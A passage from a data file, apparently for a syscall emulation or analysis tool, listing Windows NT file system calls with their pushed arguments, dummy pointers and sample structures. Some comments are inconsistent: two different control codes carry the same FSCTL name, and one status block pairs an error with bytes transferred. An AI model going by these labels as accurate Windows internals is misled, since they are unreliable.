"PVOID", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "SecurityQualityOfService", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" } ] } } }, "NtDeleteFile": { "ntFunc": "NtDeleteFile", "pushes": [ { "value": "0xbadd00c0", "additionalComment": "POBJECT_ATTRIBUTES ObjectAttributes (dummy pointer)", "structurePointer": "OBJECT_ATTRIBUTES", "structureRef": "struct153", "structureValueExpectations": "Length, RootDirectory, ObjectName, Attributes, SecurityDescriptor, SecurityQualityOfService.", "pointedValue": None } ], "structures": { "struct153": { "type": "OBJECT_ATTRIBUTES", "fields": [ { "fieldName": "Length", "fieldType": "ULONG", "fieldValue": "0x00000030", "fieldComment": "Size of OBJECT_ATTRIBUTES" }, { "fieldName": "RootDirectory", "fieldType": "HANDLE", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "ObjectName", "fieldType": "PUNICODE_STRING", "fieldValue": "0xbadd0130", "fieldComment": "Pointer to UNICODE_STRING (dummy pointer)" }, { "fieldName": "Attributes", "fieldType": "ULONG", "fieldValue": "0x00000040", "fieldComment": "OBJ_CASE_INSENSITIVE" }, { "fieldName": "SecurityDescriptor", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "SecurityQualityOfService", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" } ] } } }, "NtDeviceIoControlFile": { "ntFunc": "NtDeviceIoControlFile", "pushes": [ { "value": "0x00001000", "additionalComment": "ULONG OutputBufferLength (4096 bytes)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd00d0", "additionalComment": "PVOID OutputBuffer (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0xbadd00e0" }, { "value": "0x00000800", "additionalComment": "ULONG InputBufferLength (2048 bytes)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd00e0", "additionalComment": "PVOID InputBuffer (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0xbadd00f0" }, { "value": "0x0022200B", "additionalComment": "ULONG IoControlCode (IOCTL code example: FSCTL_GET_COMPRESSION)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd00f0", "additionalComment": "PIO_STATUS_BLOCK IoStatusBlock (dummy pointer)", "structurePointer": "IO_STATUS_BLOCK", "structureRef": "struct154", "structureValueExpectations": "Status and information fields.", "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PVOID ApcContext (None, no APC context)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PIO_APC_ROUTINE ApcRoutine (None, no APC routine)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "HANDLE Event (None, no event)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000044", "additionalComment": "HANDLE FileHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": { "struct154": { "type": "IO_STATUS_BLOCK", "fields": [ { "fieldName": "Status", "fieldType": "NTSTATUS", "fieldValue": "0x00000000", "fieldComment": "Will be set by system" }, { "fieldName": "Information", "fieldType": "ULONG_PTR", "fieldValue": "0x00000000", "fieldComment": "Will be set by system" } ] } } }, "NtFlushBuffersFile": { "ntFunc": "NtFlushBuffersFile", "pushes": [ { "value": "0xbadd0000", "additionalComment": "Pointer to IO_STATUS_BLOCK IoStatusBlock (dummy pointer)", "structurePointer": "IO_STATUS_BLOCK", "structureRef": "struct155", "structureValueExpectations": "Status and information fields for I/O completion.", "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE FileHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": { "struct155": { "type": "IO_STATUS_BLOCK", "fields": [ { "fieldName": "Status", "fieldType": "NTSTATUS", "fieldValue": "0x00000000", "fieldComment": "STATUS_SUCCESS" }, { "fieldName": "Information", "fieldType": "ULONG_PTR", "fieldValue": "0x00000000", "fieldComment": "No additional info" } ] } } }, "NtFsControlFile": { "ntFunc": "NtFsControlFile", "pushes": [ { "value": "0x00001000", "additionalComment": "ULONG OutputBufferLength (4096 bytes)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0010", "additionalComment": "Pointer to OutputBuffer (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0xbadd1010" }, { "value": "0x00000020", "additionalComment": "ULONG InputBufferLength (32 bytes)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0020", "additionalComment": "Pointer to InputBuffer (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0xbadd1020" }, { "value": "0x00090018", "additionalComment": "ULONG FsControlCode (FSCTL_GET_COMPRESSION)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0030", "additionalComment": "Pointer to IO_STATUS_BLOCK IoStatusBlock (dummy pointer)", "structurePointer": "IO_STATUS_BLOCK", "structureRef": "struct156", "structureValueExpectations": "Status and information fields for I/O completion.", "pointedValue": None }, { "value": "0xbadd0040", "additionalComment": "Pointer to ApcContext (dummy pointer, usually None)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0x00000000", "additionalComment": "PIO_APC_ROUTINE ApcRoutine (None, no APC)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "HANDLE Event (None, no event)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE FileHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": { "struct156": { "type": "IO_STATUS_BLOCK", "fields": [ { "fieldName": "Status", "fieldType": "NTSTATUS", "fieldValue": "0xC0000023", "fieldComment": "STATUS_BUFFER_TOO_SMALL" }, { "fieldName": "Information", "fieldType": "ULONG_PTR", "fieldValue": "0x00000010", "fieldComment": "16 bytes transferred" } ] } } }, "NtLockFile": { "ntFunc": "NtLockFile", "pushes": [ { "value": "0x00000001", "additionalComment": "BOOLEAN ExclusiveLock (TRUE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "BOOLEAN FailImmediately (FALSE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x000000AA", "additionalComment": "ULONG Key (arbitrary key value)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0050", "additionalComment": "Pointer to LARGE_INTEGER Length (dummy pointer)", "structurePointer": "LARGE_INTEGER", "structureRef": "struct157", "structureValueExpectations": "Length of the region to lock.", "pointedValue": None }, { "value": "0xbadd0060", "additionalComment": "Pointer to LARGE_INTEGER ByteOffset (dummy pointer)", "structurePointer": "LARGE_INTEGER", "structureRef": "struct158", "structureValueExpectations": "Starting byte offset for the lock.", "pointedValue": None }, { "value": "0xbadd0070", "additionalComment": "Pointer to IO_STATUS_BLOCK IoStatusBlock (dummy pointer)", "structurePointer": "IO_STATUS_BLOCK", "structureRef": "struct159", "structureValueExpectations": "Status and information fields for I/O completion.", "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PVOID ApcContext (None, no APC context)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PIO_APC_ROUTINE ApcRoutine (None, no APC routine)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "HANDLE Event (None, no event)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE FileHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": { "struct157": { "type": "LARGE_INTEGER", "fields": [ { "fieldName": "QuadPart", "fieldType": "LONGLONG", "fieldValue": "0x0000000000001000", "fieldComment": "Length: 4096 bytes" } ] }, "struct158": { "type": "LARGE_INTEGER", "fields": [ { "fieldName": "QuadPart", "fieldType": "LONGLONG", "fieldValue": "0x0000000000000000", "fieldComment": "Offset: start of file" } ] }, "struct159": { "type": "IO_STATUS_BLOCK", "fields": [ { "fieldName": "Status", "fieldType": "NTSTATUS", "fieldValue": "0x00000000", "fieldComment": "STATUS_SUCCESS" }, { "fieldName": "Information", "fieldType": "ULONG_PTR", "fieldValue": "0x00000000", "fieldComment": "No additional info" } ] } } }, "NtNotifyChangeDirectoryFile": { "ntFunc": "NtNotifyChangeDirectoryFile", "pushes": [ { "value": "0x00000001", "additionalComment": "BOOLEAN WatchTree (TRUE, watch subdirectories)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x0000010A", "additionalComment": "ULONG CompletionFilter (FILE_NOTIFY_CHANGE_FILE_NAME | FILE_NOTIFY_CHANGE_DIR_NAME)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00001000", "additionalComment": "ULONG BufferSize (4096 bytes)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0080", "additionalComment": "Pointer to Buffer (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0xbadd1080" }, { "value": "0xbadd0090", "additionalComment": "Pointer to IO_STATUS_BLOCK IoStatusBlock (dummy pointer)", "structurePointer": "IO_STATUS_BLOCK", "structureRef": "struct160", "structureValueExpectations": "Status and information fields for I/O completion.", "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PVOID ApcContext (None, no APC context)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PIO_APC_ROUTINE ApcRoutine (None, no APC routine)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "HANDLE Event (None, no event)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE FileHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": { "struct160": { "type": "IO_STATUS_BLOCK", "fields": [ { "fieldName": "Status", "fieldType": "NTSTATUS", "fieldValue": "0x00000103", "fieldComment": "STATUS_PENDING" }, { "fieldName": "Information", "fieldType": "ULONG_PTR", "fieldValue": "0x00000000", "fieldComment": "No additional info" } ] } } }, "NtOpenFile": { "ntFunc": "NtOpenFile", "pushes": [ { "value": "0x00000020", "additionalComment": "ULONG OpenOptions (FILE_NON_DIRECTORY_FILE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000007", "additionalComment": "ULONG ShareAccess (FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd00a0", "additionalComment": "Pointer to IO_STATUS_BLOCK IoStatusBlock (dummy pointer)", "structurePointer": "IO_STATUS_BLOCK", "structureRef": "struct161", "structureValueExpectations": "Status and information fields for I/O completion.", "pointedValue": None }, { "value": "0xbadd00b0", "additionalComment": "Pointer to OBJECT_ATTRIBUTES (dummy pointer)", "structurePointer": "OBJECT_ATTRIBUTES", "structureRef": "struct162", "structureValueExpectations": "Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.", "pointedValue": None }, { "value": "0x00120089", "additionalComment": "ACCESS_MASK DesiredAccess (GENERIC_READ | SYNCHRONIZE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd00c0", "additionalComment": "Pointer to HANDLE FileHandle (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" } ], "structures": { "struct161": { "type": "IO_STATUS_BLOCK", "fields": [ { "fieldName": "Status", "fieldType": "NTSTATUS", "fieldValue": "0x00000000", "fieldComment": "STATUS_SUCCESS" }, { "fieldName": "Information", "fieldType": "ULONG_PTR", "fieldValue": "0x00000000", "fieldComment": "No additional info" } ] }, "struct162": { "type": "OBJECT_ATTRIBUTES", "fields": [ { "fieldName": "Length", "fieldType": "ULONG", "fieldValue": "0x00000030", "fieldComment": "Size of OBJECT_ATTRIBUTES" }, { "fieldName": "RootDirectory", "fieldType": "HANDLE", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "ObjectName", "fieldType": "PUNICODE_STRING", "fieldValue": "0x00000000", "fieldComment": "None (no name)" }, { "fieldName": "Attributes", "fieldType": "ULONG", "fieldValue": "0x00000040", "fieldComment": "OBJ_CASE_INSENSITIVE" }, { "fieldName": "SecurityDescriptor", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "SecurityQualityOfService", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" } ] } } }, "NtQueryAttributesFile": { "ntFunc": "NtQueryAttributesFile", "pushes": [ { "value": "0xbadd0000", "additionalComment": "Pointer to FILE_BASIC_INFORMATION (dummy pointer)", "structurePointer": "FILE_BASIC_INFORMATION", "structureRef": "struct163", "structureValueExpectations": "Basic file attributes such as creation time, last access time, etc.", "pointedValue": None }, { "value": "0xbadd0010", "additionalComment": "Pointer to OBJECT_ATTRIBUTES (dummy pointer)", "structurePointer": "OBJECT_ATTRIBUTES", "structureRef": "struct164", "structureValueExpectations": "Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.", "pointedValue": None } ], "structures": { "struct163": { "type": "FILE_BASIC_INFORMATION", "fields": [ { "fieldName": "CreationTime", "fieldType": "LARGE_INTEGER", "fieldValue": "0x01D8E3B5A2B0000", "fieldComment": "Sample file creation time" }, { "fieldName": "LastAccessTime", "fieldType": "LARGE_INTEGER", "fieldValue": "0x01D8E3B5A2B1000", "fieldComment": "Sample last access time" }, { "fieldName": "LastWriteTime", "fieldType": "LARGE_INTEGER", "fieldValue": "0x01D8E3B5A2B2000", "fieldComment": "Sample last write time" }, { "fieldName": "ChangeTime", "fieldType": "LARGE_INTEGER", "fieldValue": "0x01D8E3B5A2B3000", "fieldComment": "Sample change time" }, { "fieldName": "FileAttributes", "fieldType": "ULONG", "fieldValue": "0x00000020", "fieldComment": "FILE_ATTRIBUTE_ARCHIVE" } ] }, "struct164": { "type": "OBJECT_ATTRIBUTES", "fields": [ { "fieldName": "Length", "fieldType": "ULONG", "fieldValue": "0x00000030", "fieldComment": "Size of OBJECT_ATTRIBUTES" }, { "fieldName": "RootDirectory", "fieldType": "HANDLE", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "ObjectName", "fieldType": "PUNICODE_STRING", "fieldValue": "0xbadd00d0", "fieldComment": "Pointer to UNICODE_STRING (dummy pointer)" }, { "fieldName": "Attributes", "fieldType": "ULONG", "fieldValue": "0x00000040", "fieldComment": "OBJ_CASE_INSENSITIVE" }, { "fieldName": "SecurityDescriptor", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "SecurityQualityOfService", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" } ] } } }, "NtQueryDirectoryFile": { "ntFunc": "NtQueryDirectoryFile", "pushes": [ { "value": "0x00000001", "additionalComment": "BOOLEAN RestartScan (TRUE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0020", "additionalComment": "Pointer to UNICODE_STRING FileName (dummy pointer)", "structurePointer": "UNICODE_STRING", "structureRef": "struct165", "structureValueExpectations": "UNICODE_STRING structure describing the file name to query for.", "pointedValue": None }, { "value": "0x00000000", "additionalComment": "BOOLEAN ReturnSingleEntry (FALSE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000001", "additionalComment": "FILE_INFORMATION_CLASS FileInformationClass (FileDirectoryInformation)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00001000", "additionalComment": "ULONG Length (4096 bytes)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0030", "additionalComment": "Pointer to buffer for FileInformation (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0xbadd0040", "additionalComment": "Pointer to IO_STATUS_BLOCK (dummy pointer)", "structurePointer": "IO_STATUS_BLOCK", "structureRef": "struct166", "structureValueExpectations": "Status and information fields for the I/O operation.", "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PVOID ApcContext (None)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PIO_APC_ROUTINE ApcRoutine (None)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "HANDLE Event (None)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE FileHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": { "struct165": { "type": "UNICODE_STRING", "fields": [ { "fieldName": "Length", "fieldType": "USHORT", "fieldValue": "0x0010", "fieldComment": "Length in bytes of the string" }, { "fieldName": "MaximumLength", "fieldType": "USHORT", "fieldValue": "0x0020", "fieldComment": "Maximum length in bytes" }, { "fieldName": "Buffer", "fieldType": "PWSTR", "fieldValue": "0xbadd00e0", "fieldComment": "Pointer to wide string buffer (dummy pointer)" } ] }, "struct166": { "type": "IO_STATUS_BLOCK", "fields": [ { "fieldName": "Status", "fieldType": "NTSTATUS", "fieldValue": "0x00000000", "fieldComment": "Operation status (initialized to 0)" }, { "fieldName": "Information", "fieldType": "ULONG_PTR", "fieldValue": "0x00000000", "fieldComment": "Operation information (initialized to 0)" } ] } } }, "NtQueryEaFile": { "ntFunc": "NtQueryEaFile", "pushes": [ { "value": "0x00000000", "additionalComment": "BOOLEAN RestartScan (FALSE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0050", "additionalComment": "Pointer to ULONG EaIndex (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000001" }, { "value": "0x00000020", "additionalComment": "ULONG EaListLength (32 bytes)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0060", "additionalComment": "Pointer to EaList buffer (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0x00000000", "additionalComment": "BOOLEAN ReturnSingleEntry (FALSE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00001000", "additionalComment": "ULONG Length (4096 bytes)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0070", "additionalComment": "Pointer to Buffer for EA data (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0xbadd0080", "additionalComment": "Pointer to IO_STATUS_BLOCK (dummy pointer)", "structurePointer": "IO_STATUS_BLOCK", "structureRef": "struct166", "structureValueExpectations": "Status and information fields for the I/O operation.", "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE FileHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": { "struct166": { "type": "IO_STATUS_BLOCK", "fields": [ { "fieldName": "Status", "fieldType": "NTSTATUS", "fieldValue": "0x00000000", "fieldComment": "Operation status (initialized to 0)" }, { "fieldName": "Information", "fieldType": "ULONG_PTR", "fieldValue": "0x00000000", "fieldComment": "Operation information (initialized to 0)" } ] } } }, "NtQueryFullAttributesFile": { "ntFunc": "NtQueryFullAttributesFile", "pushes": [ { "value": "0xbadd0090", "additionalComment": "Pointer to FILE_NETWORK_OPEN_INFORMATION (dummy pointer)", "structurePointer": "FILE_NETWORK_OPEN_INFORMATION", "structureRef": "struct167", "structureValueExpectations": "Network open information for the file (timestamps, size, attributes, etc).", "pointedValue": None }, { "value": "0xbadd00a0", "additionalComment": "Pointer to OBJECT_ATTRIBUTES (dummy pointer)", "structurePointer": "OBJECT_ATTRIBUTES", "structureRef": "struct164", "structureValueExpectations": "Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.", "pointedValue": None } ], "structures": { "struct167": { "type": "FILE_NETWORK_OPEN_INFORMATION", "fields": [ { "fieldName": "CreationTime", "fieldType": "LARGE_INTEGER", "fieldValue": "0x01D8E3B5A2B0000", "fieldComment": "Sample file creation time" }, { "fieldName": "LastAccessTime", "fieldType": "LARGE_INTEGER", "fieldValue": "0x01D8E3B5A2B1000", "fieldComment": "Sample last access time" }, { "fieldName": "LastWriteTime", "fieldType": "LARGE_INTEGER", "fieldValue": "0x01D8E3B5A2B2000", "fieldComment": "Sample last write time" }, { "fieldName": "ChangeTime", "fieldType": "LARGE_INTEGER", "fieldValue": "0x01D8E3B5A2B3000", "fieldComment": "Sample change time" }, { "fieldName": "AllocationSize", "fieldType": "LARGE_INTEGER", "fieldValue": "0x00002000", "fieldComment": "Sample allocation size" }, { "fieldName": "EndOfFile", "fieldType": "LARGE_INTEGER", "fieldValue": "0x00001800", "fieldComment": "Sample end of file" }, { "fieldName": "FileAttributes", "fieldType": "ULONG", "fieldValue": "0x00000020", "fieldComment": "FILE_ATTRIBUTE_ARCHIVE" } ] }, "struct164": { "type": "OBJECT_ATTRIBUTES", "fields": [ { "fieldName": "Length", "fieldType": "ULONG", "fieldValue": "0x00000030", "fieldComment": "Size of OBJECT_ATTRIBUTES" }, { "fieldName": "RootDirectory", "fieldType": "HANDLE", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "ObjectName", "fieldType": "PUNICODE_STRING", "fieldValue": "0xbadd00d0", "fieldComment": "Pointer to UNICODE_STRING (dummy pointer)" }, { "fieldName": "Attributes", "fieldType": "ULONG", "fieldValue": "0x00000040", "fieldComment": "OBJ_CASE_INSENSITIVE" }, { "fieldName": "SecurityDescriptor", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "SecurityQualityOfService", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" } ] } } }, "NtQueryInformationFile": { "ntFunc": "NtQueryInformationFile", "pushes": [ { "value": "0x00000005", "additionalComment": "FILE_INFORMATION_CLASS FileInformationClass (FileStandardInformation)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000100", "additionalComment": "ULONG Length (256 bytes)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd00b0", "additionalComment": "Pointer to buffer for FileInformation (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0xbadd00c0", "additionalComment": "Pointer to IO_STATUS_BLOCK (dummy pointer)", "structurePointer": "IO_STATUS_BLOCK", "structureRef": "struct166", "structureValueExpectations": "Status and information fields for the I/O operation.", "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE FileHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": { "struct166": { "type": "IO_STATUS_BLOCK", "fields": [ { "fieldName": "Status", "fieldType": "NTSTATUS", "fieldValue": "0x00000000", "fieldComment": "Operation status (initialized to 0)" }, { "fieldName": "Information", "fieldType": "ULONG_PTR", "fieldValue": "0x00000000", "fieldComment": "Operation information (initialized to 0)" } ] } } }, "NtQueryOleDirectoryFile": { "ntFunc": "NtQueryOleDirectoryFile", "pushes": [ { "value": "0x00000000", "additionalComment": "BOOLEAN RestartScan (FALSE, typical for initial query)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PUNICODE_STRING FileMask (None, no mask applied)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "BOOLEAN ReturnSingleEntry (FALSE, return all entries)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000001", "additionalComment": "FILE_INFORMATION_CLASS FileDirectoryInformation", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00001000", "additionalComment": "ULONG Length (4096 bytes, typical buffer size)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0000", "additionalComment": "PVOID FileInformation (dummy pointer to output buffer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0010", "additionalComment": "PIO_STATUS_BLOCK IoStatusBlock (dummy pointer)", "structurePointer": "IO_STATUS_BLOCK", "structureRef": "struct168", "structureValueExpectations": "Status and information fields for I/O result.", "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PVOID ApcContext (None, no APC context)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PIO_APC_ROUTINE ApcRoutine (None, no APC routine)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "HANDLE Event (None, synchronous operation)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE FileHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": { "struct168": { "type": "IO_STATUS_BLOCK", "fields": [ { "fieldName": "Status", "fieldType": "NTSTATUS", "fieldValue": "0x00000000", "fieldComment": "STATUS_SUCCESS (initial value)" }, { "fieldName": "Information", "fieldType": "ULONG_PTR", "fieldValue": "0x00000000", "fieldComment": "Number of bytes transferred (initial value)" } ] } } }, "NtQueryVolumeInformationFile": { "ntFunc": "NtQueryVolumeInformationFile", "pushes": [ { "value": "0x00000001", "additionalComment": "FS_INFORMATION_CLASS FileFsVolumeInformation", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000200", "additionalComment": "ULONG Length (512 bytes, typical buffer size)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0020", "additionalComment": "PVOID FsInformation (dummy pointer to output buffer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0030", "additionalComment": "PIO_STATUS_BLOCK IoStatusBlock (dummy pointer)", "structurePointer": "IO_STATUS_BLOCK", "structureRef": "struct169", "structureValueExpectations": "Status and information fields for I/O result.", "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE FileHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": { "struct169": { "type": "IO_STATUS_BLOCK", "fields": [ { "fieldName": "Status", "fieldType": "NTSTATUS", "fieldValue": "0x00000000", "fieldComment": "STATUS_SUCCESS (initial value)" }, { "fieldName": "Information", "fieldType": "ULONG_PTR", "fieldValue": "0x00000000", "fieldComment": "Number of bytes transferred (initial value)" } ] } } }, "NtReadFile": { "ntFunc": "NtReadFile", "pushes": [ { "value": "0x00000000", "additionalComment": "PULONG Key (None, not used for synchronous I/O)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PLARGE_INTEGER ByteOffset (None, read from current file position)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000100", "additionalComment": "ULONG Length (256 bytes to read)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0040", "additionalComment": "PVOID Buffer (dummy pointer to read buffer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0050", "additionalComment": "PIO_STATUS_BLOCK IoStatusBlock (dummy pointer)", "structurePointer": "IO_STATUS_BLOCK", "structureRef": "struct170", "structureValueExpectations": "Status and information fields for I/O result.", "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PVOID ApcContext (None, no APC context)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PIO_APC_ROUTINE ApcRoutine (None, no APC routine)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "HANDLE Event (None, synchronous operation)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE FileHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": { "struct170": { "type": "IO_STATUS_BLOCK", "fields": [ { "fieldName": "Status", "fieldType": "NTSTATUS", "fieldValue": "0x00000000", "fieldComment": "STATUS_SUCCESS (initial value)" }, { "fieldName": "Information", "fieldType": "ULONG_PTR", 